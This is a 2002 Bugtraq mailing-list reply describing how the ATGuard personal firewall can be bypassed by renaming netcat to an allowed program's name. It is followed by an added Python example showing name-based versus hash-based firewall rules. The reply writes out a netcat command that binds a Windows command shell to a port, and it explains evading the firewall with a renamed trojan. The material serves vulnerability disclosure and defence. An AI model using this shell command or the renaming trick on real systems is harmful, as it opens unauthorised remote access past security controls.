[25327] in bugtraq
Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible
daemon@ATHENA.MIT.EDU (BlueScreen)
Tue Apr 30 19:26:59 2002
Message-ID: <001b01c1f03b$ddecb9a0$0100a8c0@BlueScreenPrimary>
From: "BlueScreen" <BlueScreen@IT-Checkpoint.net>
To: "Jonas Koch" <jonas.koch@gmx.ch>
Cc: <bugtraq@securityfocus.com>
Date: Tue, 30 Apr 2002 13:40:32 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
As far as I see, the article you gave me at tooleaky.zensoft.com mostly deals with outbound connections.
The ATGuard problem goes further still: it is also a problem with inbound connections.
I use a Xitami Webserver on Port 50080 for testing purposes.
This Xitami Webserver is (currently) allowed to accept all connections on all ports (this is also a configuration problem, but most people just allow inbound connections from any address to any port for an application).
So, I just did the following:
I:\>cd netcat
I:\netcat>nc -e c:\winnt\system32\cmd.exe -p 500 -l
I tried to connect to port 500 with telnet: ATGuard fires up as it is supposed to. So, now I did the following:
I:\netcat>copy nc.exe xiwin32.exe
1 Datei(en) kopiert. (Translation for the curious non-German readers: 1 File copied :)
I:\netcat>xiwin32.exe -e c:\winnt\system32\cmd.exe -p 500 -l
Trying it with telnet again, I got a very nice shell without any notice from ATGuard.
That's why I also mentioned trojan horses in my advisories - just renaming your trojan horse to the name of a program that is allowed to accept inbound connections will do the trick.
> There is no ultimate way to control all outbound communication. If you use
> your own low-level drivers, no personal firewall can stop you.
Surely there is no ultimate way. But if you are not aware that a problem exists, you can't think about solutions.
Also, you will perhaps think that your personal firewall is perfectly safe while it isn't.
Best regards,
-------------------------------------------------------
BlueScreen / Florian Hobelsberger (UIN: 101782087)
Member of:
www.IT-Checkpoint.net
www.Hackeinsteiger.de
www.DvLdW.de
==================================================================
To encrypt classified messages, please download and use this PGP-Key:
http://www.florian-hobelsberger.de/BlueScreen-PGP-PubKey.txt
==================================================================
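The weakness the post demonstrates is a rule that identifies an application by its file name alone: any program copied to the allowed name inherits the permission. The Python below is an added illustration, not code from the post or from ATGuard, showing side by side a name-keyed rule and a rule keyed on a SHA-256 hash of the executable's contents, plus an audit that flags an enrolled binary whose contents have changed. The byte strings standing in for the web server and for the renamed tool, the file names and the class names are all constructed for this example; a real product would hash the actual image on disk (and ideally check its signer) and re-check it when the process binds a port.

```python
"""Name-based vs. hash-based identification of an allowed application.

Added example (not from the original post). Models the problem described
above: if the firewall's "may accept inbound connections" rule is keyed on
the executable's file name, a different program renamed to that name is
treated as the trusted one. Keying the rule on a content hash separates
the two. All file contents and names below are constructed.
"""
import hashlib
import os
import tempfile

# Constructed stand-ins for two different executables (not real PE images).
LEGIT_WEBSERVER_BYTES = b"MZ-constructed-xiwin32-web-server-image"
OTHER_TOOL_BYTES = b"MZ-constructed-unrelated-network-tool"


def sha256_of_file(path):
    """Hash a file's contents in chunks; the identity we bind the rule to."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


class NameBasedPolicy:
    """Weak scheme: the rule matches on the basename only (hypothetical class)."""

    def __init__(self, allowed_names):
        self.allowed = {n.lower() for n in allowed_names}

    def allows_inbound(self, exe_path):
        return os.path.basename(exe_path).lower() in self.allowed


class HashBasedPolicy:
    """Stronger scheme: the rule matches on the executable's content hash."""

    def __init__(self, allowed_hashes):
        self.allowed = set(allowed_hashes)

    def allows_inbound(self, exe_path):
        return sha256_of_file(exe_path) in self.allowed


def find_changed_binaries(enrolled):
    """Audit: return basenames of enrolled paths whose hash no longer matches
    (or that are missing). Useful as a periodic integrity check of the rule set."""
    changed = []
    for path, expected in enrolled.items():
        if not os.path.exists(path) or sha256_of_file(path) != expected:
            changed.append(os.path.basename(path))
    return changed


def demo():
    """Run the scenario in a temp dir and return the decisions as a dict."""
    with tempfile.TemporaryDirectory() as d:
        legit = os.path.join(d, "xiwin32.exe")
        with open(legit, "wb") as f:
            f.write(LEGIT_WEBSERVER_BYTES)

        # Enrol the legitimate server in both kinds of rule.
        name_policy = NameBasedPolicy([os.path.basename(legit)])
        hash_policy = HashBasedPolicy([sha256_of_file(legit)])

        # A different program is copied to the allowed name in another directory.
        other_dir = os.path.join(d, "other")
        os.mkdir(other_dir)
        renamed = os.path.join(other_dir, "xiwin32.exe")
        with open(renamed, "wb") as f:
            f.write(OTHER_TOOL_BYTES)

        results = {
            "name_rule_allows_renamed_tool": name_policy.allows_inbound(renamed),
            "hash_rule_allows_renamed_tool": hash_policy.allows_inbound(renamed),
            "hash_rule_allows_real_server": hash_policy.allows_inbound(legit),
        }

        # Integrity audit: the enrolled file is replaced in place; the audit sees it.
        enrolled = {legit: sha256_of_file(legit)}
        with open(legit, "wb") as f:
            f.write(OTHER_TOOL_BYTES)
        results["changed_binaries"] = find_changed_binaries(enrolled)
        return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The name-keyed rule admits the renamed tool, the hash-keyed rule rejects it while still admitting the genuine server, and the audit reports the enrolled file once its contents change. Binding rules to content hashes also means legitimate updates of the allowed program must be re-enrolled, which is the operational cost of closing this gap.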